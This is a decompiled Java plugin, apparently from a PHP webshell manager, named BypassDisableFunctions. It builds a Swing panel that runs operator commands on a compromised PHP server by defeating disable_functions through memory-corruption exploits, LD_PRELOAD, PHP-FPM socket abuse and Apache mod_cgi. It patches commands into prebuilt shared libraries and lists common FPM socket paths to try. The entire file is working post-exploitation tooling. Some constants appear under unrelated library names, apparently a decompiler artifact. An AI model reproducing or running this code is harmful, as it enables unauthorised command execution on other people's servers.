package shells.plugins.php;

import com.mysql.jdbc.MysqlErrorNumbers;
import com.sun.jna.platform.win32.WinError;
import core.Encoding;
import core.annotation.PluginAnnotation;
import core.imp.Payload;
import core.imp.Plugin;
import core.shell.ShellEntity;
import core.ui.component.RTextArea;
import core.ui.component.dialog.GOptionPane;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.Arrays;
import java.util.HashMap;
import java.util.UUID;
import javax.swing.JButton;
import javax.swing.JComboBox;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import javax.swing.JTabbedPane;
import javax.swing.JTextField;
import oracle.jdbc.driver.DatabaseError;
import org.springframework.util.AntPathMatcher;
import org.springframework.util.SystemPropertyUtils;
import util.Log;
import util.automaticBindClick;
import util.functions;
import util.http.ReqParameter;

@PluginAnnotation(payloadName = "PhpDynamicPayload", Name = "BypassDisableFunctions", DisplayName = "BypassDisableFunctions")
/* loaded from: input_file:shells/plugins/php/BypassDisableFunctions.class */
public class BypassDisableFunctions implements Plugin {
    private static final String CLASS_NAME = "BypassDisableFunctions.Run";
    private static final String[] BYPASS_MEM_PAYLOAD_LINUX = {"php-filter-bypass", "disfunpoc", "php-json-bypass", "php7-backtrace-bypass", "php7-gc-bypass", "php7-SplDoublyLinkedList-uaf", "procfs_bypass", "php74-FFI-BUG", "php5-imap_open", "php7-FFI", "PHP74-FFI-Serializable"};
    private static final String[] BYPASS_MEM_PAYLOAD_WINDOWS = {"php-filter-bypass", "php-com"};
    private static final String[] BYPASS_ENV_PAYLOAD = {"LD_PRELOAD"};
    private static final String[] BYPASS_AMC_PAYLOAD = {"Apache_mod_cgi"};
    private static final String[] BYPASS_FPM_ADDRESS = {"unix:///var/run/php5-fpm.sock", "unix:///var/run/php/php5-fpm.sock", "unix:///var/run/php-fpm/php5-fpm.sock", "unix:///var/run/php/php7-fpm.sock", "/var/run/php/php7.2-fpm.sock", "/tmp/php-cgi-56.sock", "/usr/local/var/run/php7.3-fpm.sock", "localhost:9000", "127.0.0.1:9000"};
    private static final HashMap<String, Integer> EXT_INFO = new HashMap<>();
    private boolean loadState;
    private ShellEntity shellEntity;
    private Payload payload;
    private Encoding encoding;
    private PhpEvalCode phpEvalCode;
    private final JPanel panel = new JPanel(new BorderLayout());
    private final JTabbedPane tabbedPane = new JTabbedPane();
    private final JPanel memBypassPanel = new JPanel(new BorderLayout());
    private final JPanel envBypassPanel = new JPanel(new BorderLayout());
    private final JPanel fpmBypassPanel = new JPanel(new BorderLayout());
    private final JPanel amcBypassPanel = new JPanel(new BorderLayout());
    private final JComboBox<String> memPayloadComboBox = new JComboBox<>(BYPASS_MEM_PAYLOAD_LINUX);
    private final JButton memRunButton = new JButton("Run");
    private final RTextArea memResultTextArea = new RTextArea();
    private final JTextField memCommandTextField = new JTextField(35);
    private final JLabel memPayloadLabel = new JLabel("payload");
    private final JLabel memCommandLabel = new JLabel("command");
    private final JLabel memTempPathLabel = new JLabel("Temp Path");
    private final JTextField memTempPathTextField = new JTextField(30);
    private final JSplitPane memSplitPane = new JSplitPane();
    private final JComboBox<String> envPayloadComboBox = new JComboBox<>(BYPASS_ENV_PAYLOAD);
    private final JButton envRunButton = new JButton("Run");
    private final RTextArea envResultTextArea = new RTextArea();
    private final JTextField envCommandTextField = new JTextField(35);
    private final JLabel envPayloadLabel = new JLabel("payload");
    private final JLabel envCommandLabel = new JLabel("command");
    private final JLabel envSoPathLabel = new JLabel("Temp Path");
    private final JTextField envTempPathTextField = new JTextField(30);
    private final JSplitPane envSplitPane = new JSplitPane();
    private final JComboBox<String> fpmAddressComboBox = new JComboBox<>(BYPASS_FPM_ADDRESS);
    private final JButton fpmRunButton = new JButton("Run");
    private final RTextArea fpmResultTextArea = new RTextArea();
    private final JTextField fpmCommandTextField = new JTextField(35);
    private final JLabel fpmAddressLabel = new JLabel("FPM/FCGI 地址");
    private final JLabel fpmCommandLabel = new JLabel("command");
    private final JLabel fpmSoPathLabel = new JLabel("Temp Path");
    private final JTextField fpmTempPathTextField = new JTextField(30);
    private final JSplitPane fpmSplitPane = new JSplitPane();
    private final JComboBox<String> amcPayloadComboBox = new JComboBox<>(BYPASS_AMC_PAYLOAD);
    private final JButton amcRunButton = new JButton("Run");
    private final RTextArea amcResultTextArea = new RTextArea();
    private final JTextField amcCommandTextField = new JTextField(35);
    private final JLabel amcPayloadLabel = new JLabel("payload");
    private final JLabel amcCommandLabel = new JLabel("command");
    private final JSplitPane amcSplitPane = new JSplitPane();

    public BypassDisableFunctions() {
        this.fpmCommandTextField.setAutoscrolls(true);
        this.fpmCommandTextField.setText("whoami");
        this.fpmSplitPane.setOrientation(0);
        this.fpmAddressComboBox.setEditable(true);
        this.memCommandTextField.setAutoscrolls(true);
        this.memCommandTextField.setText("whoami");
        this.memSplitPane.setOrientation(0);
        this.envCommandTextField.setAutoscrolls(true);
        this.envCommandTextField.setText("whoami");
        this.envSplitPane.setOrientation(0);
        this.amcCommandTextField.setAutoscrolls(true);
        this.amcCommandTextField.setText("whoami");
        this.amcSplitPane.setOrientation(0);
        JPanel jPanel = new JPanel();
        jPanel.add(this.memPayloadLabel);
        jPanel.add(this.memPayloadComboBox);
        jPanel.add(this.memTempPathLabel);
        jPanel.add(this.memTempPathTextField);
        jPanel.add(this.memCommandLabel);
        jPanel.add(this.memCommandTextField);
        jPanel.add(this.memRunButton);
        this.memSplitPane.setTopComponent(jPanel);
        this.memSplitPane.setBottomComponent(new JScrollPane(this.memResultTextArea));
        this.memBypassPanel.add(this.memSplitPane);
        JPanel jPanel2 = new JPanel();
        jPanel2.add(this.envPayloadLabel);
        jPanel2.add(this.envPayloadComboBox);
        jPanel2.add(this.envSoPathLabel);
        jPanel2.add(this.envTempPathTextField);
        jPanel2.add(this.envCommandLabel);
        jPanel2.add(this.envCommandTextField);
        jPanel2.add(this.envRunButton);
        this.envSplitPane.setTopComponent(jPanel2);
        this.envSplitPane.setBottomComponent(new JScrollPane(this.envResultTextArea));
        this.envBypassPanel.add(this.envSplitPane);
        JPanel jPanel3 = new JPanel();
        jPanel3.add(this.fpmAddressLabel);
        jPanel3.add(this.fpmAddressComboBox);
        jPanel3.add(this.fpmSoPathLabel);
        jPanel3.add(this.fpmTempPathTextField);
        jPanel3.add(this.fpmCommandLabel);
        jPanel3.add(this.fpmCommandTextField);
        jPanel3.add(this.fpmRunButton);
        this.fpmSplitPane.setTopComponent(jPanel3);
        this.fpmSplitPane.setBottomComponent(new JScrollPane(this.fpmResultTextArea));
        this.fpmBypassPanel.add(this.fpmSplitPane);
        JPanel jPanel4 = new JPanel();
        jPanel4.add(this.amcPayloadLabel);
        jPanel4.add(this.amcPayloadComboBox);
        jPanel4.add(this.amcCommandLabel);
        jPanel4.add(this.amcCommandTextField);
        jPanel4.add(this.amcRunButton);
        this.amcSplitPane.setTopComponent(jPanel4);
        this.amcSplitPane.setBottomComponent(new JScrollPane(this.amcResultTextArea));
        this.amcBypassPanel.add(this.amcSplitPane);
        this.tabbedPane.addTab("MemBypass", this.memBypassPanel);
        this.tabbedPane.addTab("EnvBypass", this.envBypassPanel);
        this.tabbedPane.addTab("FPMBypass", this.fpmBypassPanel);
        this.tabbedPane.addTab("AMCBypass", this.amcBypassPanel);
        this.panel.add(this.tabbedPane);
    }

    private void memRunButtonClick(ActionEvent actionEvent) {
        String str = (String) this.memPayloadComboBox.getSelectedItem();
        String str2 = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", str)));
        String text = this.memCommandTextField.getText();
        ReqParameter reqParameter = new ReqParameter();
        String str3 = this.memTempPathTextField.getText() + "." + functions.md5(UUID.randomUUID().toString());
        if ("php-filter-bypass".equals(str)) {
            text = String.format("%s > %s", text, str3);
        }
        reqParameter.add("cmd", text);
        this.memResultTextArea.setText(eval(str2, reqParameter));
        if ("php-filter-bypass".equals(str)) {
            this.memResultTextArea.setText(this.encoding.Decoding(this.payload.downloadFile(str3)));
            this.payload.deleteFile(str3);
        }
    }

    private void fpmRunButtonClick(ActionEvent actionEvent) throws Exception {
        String str;
        String str2 = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", "FPM")));
        ReqParameter reqParameter = new ReqParameter();
        String formatDir = functions.formatDir(this.fpmTempPathTextField.getText());
        String str3 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str4 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str5 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        int i = -1;
        String trim = this.fpmAddressComboBox.getEditor().getItem().toString().trim();
        try {
            if (trim.startsWith("unix")) {
                str = trim;
            } else if (trim.startsWith(AntPathMatcher.DEFAULT_PATH_SEPARATOR)) {
                str = String.format("unix://%s", trim);
            } else {
                String[] split = trim.split(SystemPropertyUtils.VALUE_SEPARATOR);
                str = split[0];
                i = Integer.valueOf(split[1]).intValue();
            }
            reqParameter.add("fpm_host", str);
            reqParameter.add("fpm_port", String.valueOf(i));
            reqParameter.add("soFile", str5);
            reqParameter.add("cmdFile", str3);
            reqParameter.add("resultFile", str4);
            reqParameter.add("so", generateExt(generateCmd(str3, str4)));
            reqParameter.add("cmd", this.fpmCommandTextField.getText());
            this.fpmResultTextArea.setText(eval(str2, reqParameter));
        } catch (Exception e) {
            Log.error(e);
            GOptionPane.showMessageDialog(null, e.getMessage());
        }
    }

    private void envRunButtonClick(ActionEvent actionEvent) throws Exception {
        if (this.payload.isWindows()) {
            GOptionPane.showMessageDialog(this.shellEntity.getFrame(), "仅支持Linux", "警告", 2);
            return;
        }
        String str = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", (String) this.envPayloadComboBox.getSelectedItem())));
        ReqParameter reqParameter = new ReqParameter();
        String formatDir = functions.formatDir(this.envTempPathTextField.getText());
        String str2 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str3 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        reqParameter.add("soFile", formatDir + "." + functions.md5(UUID.randomUUID().toString()));
        reqParameter.add("cmdFile", str2);
        reqParameter.add("resultFile", str3);
        reqParameter.add("so", generateExt(generateCmd(str2, str3)));
        reqParameter.add("cmd", this.envCommandTextField.getText());
        this.envResultTextArea.setText(eval(str, reqParameter));
    }

    private void amcRunButtonClick(ActionEvent actionEvent) throws Exception {
        String str = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", (String) this.amcPayloadComboBox.getSelectedItem())));
        String url = this.shellEntity.getUrl();
        int lastIndexOf = url.lastIndexOf(AntPathMatcher.DEFAULT_PATH_SEPARATOR);
        if (lastIndexOf != -1) {
            url = url.substring(0, lastIndexOf + 1);
        }
        ReqParameter reqParameter = new ReqParameter();
        reqParameter.add("shellurl", url);
        reqParameter.add("cmd", this.amcCommandTextField.getText());
        this.amcResultTextArea.setText(eval(str, reqParameter));
    }

    private byte[] generateExt(String str) throws Exception {
        int i = 86;
        String str2 = "so";
        try {
            i = this.payload.isX64() ? 64 : 86;
        } catch (Exception e) {
            Log.error(e);
        }
        try {
            str2 = !this.payload.isWindows() ? "so" : "dll";
        } catch (Exception e2) {
            Log.error(e2);
        }
        int intValue = EXT_INFO.get(String.format("ant_x%s_%s_start", Integer.valueOf(i), str2)).intValue();
        int intValue2 = EXT_INFO.get(String.format("ant_x%s_%s_end", Integer.valueOf(i), str2)).intValue();
        InputStream resourceAsStream = BypassDisableFunctions.class.getResourceAsStream(String.format("assets/ant_x%s.%s", Integer.valueOf(i), str2));
        int i2 = intValue2 - intValue;
        byte[] readInputStream = functions.readInputStream(resourceAsStream);
        resourceAsStream.close();
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        byte[] bytes = str.getBytes();
        byte[] bArr = new byte[i2 - bytes.length];
        Arrays.fill(bArr, (byte) 32);
        readInputStream[intValue2] = 0;
        byteArrayOutputStream.write(readInputStream, 0, intValue);
        byteArrayOutputStream.write(bytes, 0, bytes.length);
        byteArrayOutputStream.write(bArr, 0, bArr.length);
        byteArrayOutputStream.write(readInputStream, intValue2, readInputStream.length - intValue2);
        return byteArrayOutputStream.toByteArray();
    }

    private String generateCmd(String str, String str2) {
        return !this.payload.isWindows() ? "bash " + str + " > " + str2 : "cmd /c " + str + " > " + str2;
    }

    private String eval(String str, ReqParameter reqParameter) {
        try {
            if (this.phpEvalCode == null) {
                try {
                    if (this.phpEvalCode == null) {
                        this.phpEvalCode = (PhpEvalCode) this.shellEntity.getFrame().getPlugin("P_Eval_Code");
                    }
                } catch (Exception e) {
                    GOptionPane.showMessageDialog(this.shellEntity.getFrame(), "no find plugin P_Eval_Code!");
                    return "";
                }
            }
            return this.phpEvalCode.eval(str, reqParameter);
        } catch (Throwable th) {
            return "";
        }
    }

    @Override // core.imp.Plugin
    public void init(ShellEntity shellEntity) {
        this.shellEntity = shellEntity;
        this.payload = this.shellEntity.getPayloadModule();
        this.encoding = Encoding.getEncoding(this.shellEntity);
        this.envTempPathTextField.setText(this.payload.currentDir());
        this.fpmTempPathTextField.setText(this.payload.currentDir());
        this.memTempPathTextField.setText(this.payload.currentDir());
        if (this.payload.isWindows()) {
            this.memPayloadComboBox.removeAllItems();
            for (String str : BYPASS_MEM_PAYLOAD_WINDOWS) {
                this.memPayloadComboBox.addItem(str);
            }
        }
        automaticBindClick.bindJButtonClick(this, this);
    }

    @Override // core.imp.Plugin
    public JPanel getView() {
        return this.panel;
    }

    static {
        EXT_INFO.put("ant_x86_so_start", 275);
        EXT_INFO.put("ant_x86_so_end", 504);
        EXT_INFO.put("ant_x64_so_start", Integer.valueOf(DatabaseError.TTC0206));
        EXT_INFO.put("ant_x64_so_end", Integer.valueOf(WinError.ERROR_FILE_SYSTEM_LIMITATION));
        EXT_INFO.put("ant_x86_dll_start", Integer.valueOf(MysqlErrorNumbers.ER_EVENT_EXEC_TIME_IN_THE_PAST));
        EXT_INFO.put("ant_x86_dll_end", Integer.valueOf(MysqlErrorNumbers.ER_WRONG_PERFSCHEMA_USAGE));
        EXT_INFO.put("ant_x64_dll_start", 1552);
        EXT_INFO.put("ant_x64_dll_end", Integer.valueOf(MysqlErrorNumbers.ER_WRONG_SPVAR_TYPE_IN_LIMIT));
    }
}
